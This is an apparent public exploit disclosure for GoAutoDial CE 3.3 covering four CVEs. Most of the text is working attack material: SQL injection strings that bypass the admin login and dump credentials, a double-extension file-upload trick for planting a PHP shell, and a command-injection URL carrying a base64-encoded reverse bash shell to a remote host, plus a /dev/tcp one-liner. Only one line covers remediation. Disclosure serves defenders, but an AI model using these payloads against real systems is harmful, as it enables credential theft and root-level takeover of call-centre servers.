GoAutoDial CE 3.3-1406088000 - Authentication Bypass / Arbitrary File Upload / Command Injection





Affected software: GoAutoDial
Affected version: 3.3-1406088000 (GoAdmin) and previous releases of GoAutodial 3.3
Associated CVEs: CVE-2015-2842, CVE-2015-2843, CVE-2015-2844, CVE-2015-2845
Vendor advisory: http://goautodial.org/news/21

Multiple vulnerabilties exist in the GoAutodial 3.3 open source call centre software that will lead to a complete compromise of the underlying database and infrastructure.

Given that multiple product updates were released during testing that do not include any code changes related to the described vulnerabilities, any version between 3.3-1406088000 and 3.3-1421902800 might also be vulnerable.
Refer to the product changelog.txt: https://github.com/goautodial/ce-www/blob/master/changelog.txt

1/ CVE-2015-2843 
 -  SQLi authentication bypass due to lack of input sanitisation
Affected file: go_login.php
Issue: Lack of input sanitisation on input parameters user_name and user_pass prior to being handled by the database.

A simple 'OR '1'='1 in the password field with a username of 'admin' will log you in. (assuming the default administrator user has not been removed).
You can also test this by performing the following GET request:

https://<ip>/go_login/validate_credentials/admin/' OR '1'='1
 -  SQLi within the 'go_get_user_info' function
Affected file: go_site.php
Issue: Lack of input sanitisation on input parameters being handled by the database

This function returns a single entry from the db that contains user information including the username and password. 
Given that the first 'active' user in the db would most likely be the admin user you can search for active=Y. There is a column in the vicidial_users table that identifies whether a user is active (Y) or not active (N).
Given this, you can perform the following to return an admin user's account username and password.

https://<ip>/index.php/go_site/go_get_user_info/' or active='Y 

2/ CVE-2015-2842
 -  Arbitrary file upload within the 'audiostore' upload functionality
Affected file: go_audiostore.php
Issue: Filename extensions are not properly checked to ensure only 'audio' files can be uploaded

A user can upload a file with the filename 'bogus.wav.php'. The filename is checked for the '.wav' extension and the check is passed, however with the trailing '.php' file extension, much fun is obtained.
An uploaded file is moved to a symlinked directory (/var/lib/asterisk/sounds) of which can be viewed directly from the browser. 
Note*: All user uploaded files are given the 'go_' prefix. This example ends up with 'go_bogus.wav.php' as an uploaded file.

** Pop goes the shell **

3/ CVE-2015-2844 and CVE-2015-2845
 - Arbitrary command injection via the cpanel function due to lack of input sanitisation
Affected file: go_site.php
Issue: User supplied parameters are passed to the php 'exec' function, of which the intended function can be escaped to do more sinister things.

Two variables are passed to the underlying exec command, $action and $type. Either one can be used.
URI looks like this: https://<ip>/index.php/go_site/cpanel/$type/$action

Affected code: exec("/usr/share/goautodial/goautodialc.pl '/sbin/service $type ".strtolower($action)."'");

Base64 encoding bypasses any web server encoding and a lovely root shell is obtained.
** pop goes a root shell **
reverse bash shell one liner: bash -i >& /dev/tcp/ 0>&1 

https://<ip>/index.php/go_site/cpanel/|| bash -c "eval \`echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTEvNDQ0NCAwPiYx | base64 --decode\`"  

Vulnerability Remediation

Upgrade to version 3.3-1421902800 at a minimum.
As per the vendor advisory, follow the instructions provided in the link below.

Metasploit module to be created at some point  though quick and dirty python scripts work just fine too...